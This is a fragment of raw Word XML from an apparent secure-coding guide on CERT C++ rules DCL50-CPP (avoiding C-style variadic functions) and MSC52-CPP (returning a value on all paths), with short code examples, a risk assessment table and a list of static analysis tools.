              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>template</w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>typename</w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Arg, </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>typename</w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>... Ts, </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>typename</w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::enable_if&lt;std::is_integral&lt;Arg&gt;::value&gt;::type * = nullptr&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26341224" w14:textId="77777777" w:rsidR="00317E68" w:rsidRPr="00317E68" w:rsidRDefault="00317E68" w:rsidP="00317E68">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>add(Arg f, Ts... rest) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A8C6D2" w14:textId="77777777" w:rsidR="00317E68" w:rsidRPr="00317E68" w:rsidRDefault="00317E68" w:rsidP="00317E68">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f + add(rest...);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="783CC6FF" w14:textId="532DE547" w:rsidR="00317E68" w:rsidRPr="00317E68" w:rsidRDefault="00317E68" w:rsidP="00317E68">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00317E68">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>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B40E379" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3306F236" w14:textId="2C86CA86" w:rsidR="00E82BAD" w:rsidRPr="00E82BAD" w:rsidRDefault="0057667C" w:rsidP="00E82BAD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="00E82BAD">
              <w:t>Validate Input</w:t>
            </w:r>
            <w:r w:rsidR="007F6A57" w:rsidRPr="00E82BAD">
              <w:t xml:space="preserve"> Data</w:t>
            </w:r>
            <w:r w:rsidRPr="00E82BAD">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00027E4C" w:rsidRPr="00E82BAD">
              <w:t xml:space="preserve"> Runtime calls to C-style variadic functions that pass inappropriate arguments such as invalid input could yield</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7007063D" w14:textId="7D189487" w:rsidR="0057667C" w:rsidRPr="00E82BAD" w:rsidRDefault="00027E4C" w:rsidP="00E82BAD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="00E82BAD">
              <w:t xml:space="preserve"> undefined behavior that may be exploited to run arbitrary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C2D4285" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EE4DA51" w14:textId="06FC175F" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C9846CA" w14:textId="2C3A089C" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58E0ACD7" w14:textId="3987E3CF" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E539ECE" w14:textId="3CA659D2" w:rsidR="00B475A1" w:rsidRDefault="00F829BC"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E3E86F5" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Astree</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AAB69D9" w14:textId="027F1D1C" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>22.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D087CB4" w14:textId="0CA116C3" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>function-ellipsis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29A4DB2F" w14:textId="70BEF2B9" w:rsidR="00B475A1" w:rsidRDefault="00F829BC"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2BAC0BDE" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Axivion Bauhaus Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0453C4CF" w14:textId="38C0F9E5" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CB1DCF1" w14:textId="0FBC8711" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CertC++-DCL50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E75D5AD" w14:textId="4E96451B"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14277552" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Clang</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58025751" w14:textId="3814B10D" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CDCA4B3" w14:textId="30661F8A" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>cert-dcl50-cpp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67A764E8" w14:textId="7D5BF979" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Checked by clang-tidy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="0D2FC839" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20F95697" w14:textId="0A703B18" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>RuleChecker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="187BA178" w14:textId="2FB0A023" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>22.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59EE3E6D" w14:textId="3812900A" w:rsidR="00B475A1" w:rsidRDefault="00F829BC" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>funtion-ellipsis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23DDC087" w14:textId="121EBB6F" w:rsidR="00B475A1" w:rsidRDefault="002C38B9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Fully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8146ADD" w:rsidR="00381847" w:rsidRDefault="00167423">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>MSC52-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="164074C2" w14:textId="38670B86" w:rsidR="00381847" w:rsidRDefault="00167423">
            <w:r w:rsidRPr="00167423">
              <w:t>Value-returning functions must return a value from all exit paths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D47DBB8" w:rsidR="00F72634" w:rsidRDefault="00A1232C" w:rsidP="0015146B">
            <w:r>
              <w:t>The programmer did not return the input value for positive input indicating that not all code paths return a value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="347ECF59" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5E4C5FC2" w14:textId="77777777" w:rsidR="00A1232C" w:rsidRPr="00A1232C" w:rsidRDefault="00A1232C" w:rsidP="00A1232C">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>absolute_value(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>a) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33027A42" w14:textId="77777777" w:rsidR="00A1232C" w:rsidRPr="00A1232C" w:rsidRDefault="00A1232C" w:rsidP="00A1232C">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(a &lt; 0) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0118F538" w14:textId="77777777" w:rsidR="00A1232C" w:rsidRPr="00A1232C" w:rsidRDefault="00A1232C" w:rsidP="00A1232C">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>    </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A1232C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
